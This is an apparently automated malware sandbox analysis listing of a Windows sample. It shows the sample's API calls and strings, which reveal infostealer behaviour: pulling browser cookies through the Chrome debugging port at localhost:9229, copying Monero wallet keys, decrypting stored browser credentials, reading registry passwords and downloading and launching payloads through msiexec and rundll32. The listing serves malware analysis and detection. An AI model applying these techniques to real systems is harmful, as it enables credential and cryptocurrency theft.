                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateGlobalStream
                                      • String ID: image/jpeg
                                      • API String ID: 2244384528-3785015651
                                      • Opcode ID: 15abc6e36c1a42deb63380167b6df408864b6e4785502a68d6876fc647d9b847
                                      • Instruction ID: ba60c9d3abfef858dd97b9941f0fca9f45fdb03db3c38dd934d07031a5e2c3f4
                                      • Opcode Fuzzy Hash: 15abc6e36c1a42deb63380167b6df408864b6e4785502a68d6876fc647d9b847
                                      • Instruction Fuzzy Hash: 8971ED71A10258ABDB14DFE4EC85FEEB77DBF48700F108618F616AB290DB34A944CB60
                                      APIs
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00123415
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 001235AD
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 0012373A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExecuteShell$lstrcpy
                                      • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                      • API String ID: 2507796910-3625054190
                                      • Opcode ID: 8bc932f4dd9cd9e12db70e737fdd4b33a2926dfaf371f1f4b1fe1113ccf33182
                                      • Instruction ID: 3f3e24f50fd37505b419d2c879de98f30e55420d273ac28807bd4e4991d308f8
                                      • Opcode Fuzzy Hash: 8bc932f4dd9cd9e12db70e737fdd4b33a2926dfaf371f1f4b1fe1113ccf33182
                                      • Instruction Fuzzy Hash: E1121F719101289BCB19FBA0EDA2FEDB779AF24300F804599F50676191EF342B69CF61
                                      APIs
                                        • Part of subcall function 00119A50: InternetOpenA.WININET(00130AF6,00000001,00000000,00000000,00000000), ref: 00119A6A
                                      • lstrcat.KERNEL32(?,cookies), ref: 00119CAF
                                      • lstrcat.KERNEL32(?,001312C4), ref: 00119CC1
                                      • lstrcat.KERNEL32(?,?), ref: 00119CD5
                                      • lstrcat.KERNEL32(?,001312C8), ref: 00119CE7
                                      • lstrcat.KERNEL32(?,?), ref: 00119CFB
                                      • lstrcat.KERNEL32(?,.txt), ref: 00119D0D
                                      • lstrlen.KERNEL32(00000000), ref: 00119D17
                                      • lstrlen.KERNEL32(00000000), ref: 00119D26
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                                      • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                      • API String ID: 3174675846-3542011879
                                      • Opcode ID: 4a69f32511967f73431f770b501cd485e21144d7ea092373475ac90b48b7ad77
                                      • Instruction ID: ad00dc73a08b5a194229936ae9383818e2f9c342d37f2beaa0b765af735fdb68
                                      • Opcode Fuzzy Hash: 4a69f32511967f73431f770b501cd485e21144d7ea092373475ac90b48b7ad77
                                      • Instruction Fuzzy Hash: 02513271910618ABDB18EBE0EC95FEE773CAF14301F404698F205A7091EF756A89CF61
                                      APIs
                                        • Part of subcall function 0012AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0012AAF6
                                        • Part of subcall function 001162D0: InternetOpenA.WININET(00130DFF,00000001,00000000,00000000,00000000), ref: 00116331
                                        • Part of subcall function 001162D0: StrCmpCA.SHLWAPI(?,00E3F970), ref: 00116353
                                        • Part of subcall function 001162D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00116385
                                        • Part of subcall function 001162D0: HttpOpenRequestA.WININET(00000000,GET,?,00E3F0E0,00000000,00000000,00400100,00000000), ref: 001163D5
                                        • Part of subcall function 001162D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0011640F
                                        • Part of subcall function 001162D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00116421
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00125568
                                      • lstrlen.KERNEL32(00000000), ref: 0012557F
                                        • Part of subcall function 00128FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00128FE2
                                      • StrStrA.SHLWAPI(00000000,00000000), ref: 001255B4
                                      • lstrlen.KERNEL32(00000000), ref: 001255D3
                                      • lstrlen.KERNEL32(00000000), ref: 001255FE
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                      • API String ID: 3240024479-1526165396
                                      • Opcode ID: 9a529e2acc89a66fd24f95edb94b615f5f138fe676313d95c9c1721115c8ff47
                                      • Instruction ID: 74c1d7ff90c9aa3178436e8970d0f37f5d64e56601b0667b29bf0d9951a12b5f
                                      • Opcode Fuzzy Hash: 9a529e2acc89a66fd24f95edb94b615f5f138fe676313d95c9c1721115c8ff47
                                      • Instruction Fuzzy Hash: 0B511030910158EBCB18FF60EDA6AED777AAF20340FD04458F9066B591EF306B54CB62
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen
                                      • String ID:
                                      • API String ID: 2001356338-0
                                      • Opcode ID: 09dd72aa29c738ad2fa844f143f41dfe5663d090ba517b0ab58349b5d92a291d
                                      • Instruction ID: 837ba0e3f38036c91fea529d9bbe18b6821e613724aef85b40ba442a429f42fd
                                      • Opcode Fuzzy Hash: 09dd72aa29c738ad2fa844f143f41dfe5663d090ba517b0ab58349b5d92a291d
                                      • Instruction Fuzzy Hash: F5C163B5900129ABCB18EF60EC9AFDE7379BF74304F004599F509A7281DB70AA95CF91
                                      APIs
                                        • Part of subcall function 00128F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00128F9B
                                      • lstrcat.KERNEL32(?,00000000), ref: 0012453C
                                      • lstrcat.KERNEL32(?,00E3F6E0), ref: 0012455B
                                      • lstrcat.KERNEL32(?,?), ref: 0012456F
                                      • lstrcat.KERNEL32(?,00E3DE80), ref: 00124583
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                        • Part of subcall function 00128F20: GetFileAttributesA.KERNEL32(00000000,?,00111B94,?,?,0013577C,?,?,00130E22), ref: 00128F2F
                                        • Part of subcall function 0011A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0011A489
                                        • Part of subcall function 0011A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0011A13C
                                        • Part of subcall function 0011A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0011A161
                                        • Part of subcall function 0011A110: LocalAlloc.KERNEL32(00000040,?), ref: 0011A181
                                        • Part of subcall function 0011A110: ReadFile.KERNEL32(000000FF,?,00000000,0011148F,00000000), ref: 0011A1AA
                                        • Part of subcall function 0011A110: LocalFree.KERNEL32(0011148F), ref: 0011A1E0
                                        • Part of subcall function 0011A110: CloseHandle.KERNEL32(000000FF), ref: 0011A1EA
                                        • Part of subcall function 00129550: GlobalAlloc.KERNEL32(00000000,0012462D,0012462D), ref: 00129563
                                      • StrStrA.SHLWAPI(?,00E3F6B0), ref: 00124643
                                      • GlobalFree.KERNEL32(?), ref: 00124762
                                        • Part of subcall function 0011A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00114F3E,00000000,00000000), ref: 0011A23F
                                        • Part of subcall function 0011A210: LocalAlloc.KERNEL32(00000040,?,?,?,00114F3E,00000000,?), ref: 0011A251
                                        • Part of subcall function 0011A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00114F3E,00000000,00000000), ref: 0011A27A
                                        • Part of subcall function 0011A210: LocalFree.KERNEL32(?,?,?,?,00114F3E,00000000,?), ref: 0011A28F
                                      • lstrcat.KERNEL32(?,00000000), ref: 001246F3
                                      • StrCmpCA.SHLWAPI(?,001308D2), ref: 00124710
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00124722
                                      • lstrcat.KERNEL32(00000000,?), ref: 00124735
                                      • lstrcat.KERNEL32(00000000,00130FA0), ref: 00124744
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                      • String ID:
                                      • API String ID: 3541710228-0
                                      • Opcode ID: 8f28de8491483e4b35a42b381fbeed5512ab4caaa32a2dd509dc49cb7ba0b152
                                      • Instruction ID: aec708f8193d3adaf9e697456b512e985e314ffe6076ed24c33aa0ec328ad524
                                      • Opcode Fuzzy Hash: 8f28de8491483e4b35a42b381fbeed5512ab4caaa32a2dd509dc49cb7ba0b152
                                      • Instruction Fuzzy Hash: 747174B6900218ABDB14EBA0ED96FEE777DAF98300F404698F60597181EB34DB54CF51
                                      APIs
                                        • Part of subcall function 001112A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001112B4
                                        • Part of subcall function 001112A0: RtlAllocateHeap.NTDLL(00000000), ref: 001112BB
                                        • Part of subcall function 001112A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001112D7
                                        • Part of subcall function 001112A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001112F5
                                        • Part of subcall function 001112A0: RegCloseKey.ADVAPI32(?), ref: 001112FF
                                      • lstrcat.KERNEL32(?,00000000), ref: 0011134F
                                      • lstrlen.KERNEL32(?), ref: 0011135C
                                      • lstrcat.KERNEL32(?,.keys), ref: 00111377
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                        • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
                                        • Part of subcall function 0012ACC0: lstrcpy.KERNEL32(00000000), ref: 0012AD14
                                        • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                        • Part of subcall function 00128CF0: GetSystemTime.KERNEL32(00130E1B,00E3E7B8,001305B6,?,?,001113F9,?,0000001A,00130E1B,00000000,?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 00128D16
                                        • Part of subcall function 0012AC30: lstrcpy.KERNEL32(00000000,?), ref: 0012AC82
                                        • Part of subcall function 0012AC30: lstrcat.KERNEL32(00000000), ref: 0012AC92
                                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00111465
                                        • Part of subcall function 0012AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0012AAF6
                                        • Part of subcall function 0011A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0011A13C
                                        • Part of subcall function 0011A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0011A161
                                        • Part of subcall function 0011A110: LocalAlloc.KERNEL32(00000040,?), ref: 0011A181
                                        • Part of subcall function 0011A110: ReadFile.KERNEL32(000000FF,?,00000000,0011148F,00000000), ref: 0011A1AA
                                        • Part of subcall function 0011A110: LocalFree.KERNEL32(0011148F), ref: 0011A1E0
                                        • Part of subcall function 0011A110: CloseHandle.KERNEL32(000000FF), ref: 0011A1EA
                                      • DeleteFileA.KERNEL32(00000000), ref: 001114EF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                      • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                      • API String ID: 3478931302-218353709
                                      • Opcode ID: f1fd7fe58423108e4142840ff06c34c85ed4970e6bfa92730e365e6963abe39d
                                      • Instruction ID: 7a3efcda2181dfe0228703870bf315ee40a5c4f24fc73625211d0535c9cb005f
                                      • Opcode Fuzzy Hash: f1fd7fe58423108e4142840ff06c34c85ed4970e6bfa92730e365e6963abe39d
                                      • Instruction Fuzzy Hash: BE5136B1D5012857CB15FB60ED92FED737DAF64700F8045E8B60A66091EF306B98CB65
                                      APIs
                                      • InternetOpenA.WININET(00130AF6,00000001,00000000,00000000,00000000), ref: 00119A6A
                                      • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00119AAB
                                      • InternetCloseHandle.WININET(00000000), ref: 00119AC7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$Open$CloseHandle
                                      • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                      • API String ID: 3289985339-2144369209
                                      • Opcode ID: 57934a3b32bea57a5bcc239728d9c4b19a11e4d260936dea2b4e9b91803dbc8f
                                      • Instruction ID: 473a5ee756dfbee338ef9d8b066b6d137537d4b094a011153e1d4d85225d1d30
                                      • Opcode Fuzzy Hash: 57934a3b32bea57a5bcc239728d9c4b19a11e4d260936dea2b4e9b91803dbc8f
                                      • Instruction Fuzzy Hash: 7C414C75A10258EFCB29EF90EC95FDD77B8AB58740F104198F509AB190CBB0AEC4CB64
                                      APIs
                                        • Part of subcall function 00117330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0011739A
                                        • Part of subcall function 00117330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00117411
                                        • Part of subcall function 00117330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0011746D
                                        • Part of subcall function 00117330: GetProcessHeap.KERNEL32(00000000,?), ref: 001174B2
                                        • Part of subcall function 00117330: HeapFree.KERNEL32(00000000), ref: 001174B9
                                      • lstrcat.KERNEL32(00000000,0013192C), ref: 00117666
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 001176A8
                                      • lstrcat.KERNEL32(00000000, : ), ref: 001176BA
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 001176EF
                                      • lstrcat.KERNEL32(00000000,00131934), ref: 00117700
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00117733
                                      • lstrcat.KERNEL32(00000000,00131938), ref: 0011774D
                                      • task.LIBCPMTD ref: 0011775B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                      • String ID: :
                                      • API String ID: 2677904052-3653984579
                                      • Opcode ID: 088d0e1cb51c558d13479f6b894e33319f48985f15b73a978e7702c4273e23a0
                                      • Instruction ID: da197a7fe135e0aab0bab73622df84540e0dfd6747487fcf69c355d16dafae60
                                      • Opcode Fuzzy Hash: 088d0e1cb51c558d13479f6b894e33319f48985f15b73a978e7702c4273e23a0
                                      • Instruction Fuzzy Hash: A3314F72904148EFDB19EBE0DD95DFE7779AB54301F504628F202AB2E1DB34AD86CB50
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00E3F308,00000000,?,00130E14,00000000,?,00000000), ref: 001282C0
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 001282C7
                                      • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 001282E8
                                      • __aulldiv.LIBCMT ref: 00128302
                                      • __aulldiv.LIBCMT ref: 00128310
                                      • wsprintfA.USER32 ref: 0012833C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                      • String ID: %d MB$@
                                      • API String ID: 2774356765-3474575989
                                      • Opcode ID: 05ef75d4c7f39097d93a716b19b53b5aec6ae5c5ac030601e1ab9478e14ee807
                                      • Instruction ID: 3f3d4547bb19292303fc907c09160a4f9b91a2fed84349281998b7e979e555a2
                                      • Opcode Fuzzy Hash: 05ef75d4c7f39097d93a716b19b53b5aec6ae5c5ac030601e1ab9478e14ee807
                                      • Instruction Fuzzy Hash: AE215EB1E44218ABDB14DFD4DC45FAEB7B8FB44B00F104609F215BB2C0C77859018BA4
                                      APIs
                                        • Part of subcall function 0012AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0012AAF6
                                        • Part of subcall function 00114800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00114889
                                        • Part of subcall function 00114800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00114899
                                      • InternetOpenA.WININET(00130DFB,00000001,00000000,00000000,00000000), ref: 0011615F
                                      • StrCmpCA.SHLWAPI(?,00E3F970), ref: 00116197
                                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 001161DF
                                      • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00116203
                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 0011622C
                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0011625A
                                      • CloseHandle.KERNEL32(?,?,00000400), ref: 00116299
                                      • InternetCloseHandle.WININET(?), ref: 001162A3
                                      • InternetCloseHandle.WININET(00000000), ref: 001162B0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                      • String ID:
                                      • API String ID: 2507841554-0
                                      • Opcode ID: 3d0667f66d420ac8ec4f6d953cf51756d98a12ed9d53d793ea89461b4a8b48c6
                                      • Instruction ID: a08d98c1088e1899454ed0d2309bbd198810a2710991a79710e4b180fa923e09
                                      • Opcode Fuzzy Hash: 3d0667f66d420ac8ec4f6d953cf51756d98a12ed9d53d793ea89461b4a8b48c6
                                      • Instruction Fuzzy Hash: EE5173B1A00218ABDF24DF90DC85BEE7779AF44301F4085A8F605AB1C0DB756AC9CF95
                                      APIs
                                      • type_info::operator==.LIBVCRUNTIME ref: 0019024D
                                      • ___TypeMatch.LIBVCRUNTIME ref: 0019035B
                                      • CatchIt.LIBVCRUNTIME ref: 001903AC
                                      • CallUnexpected.LIBVCRUNTIME ref: 001904C8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                      • String ID: csm$csm$csm
                                      • API String ID: 2356445960-393685449
                                      • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                      • Instruction ID: 431c260db63edbdada37082c6868609ff5e0420a93f255eddd5da0351d7a7ced
                                      • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                      • Instruction Fuzzy Hash: 71B16B75C00209EFCF2AEFA4D8859AEBBB5FF18310F14416AE9156B212D731DA51CF91
                                      APIs
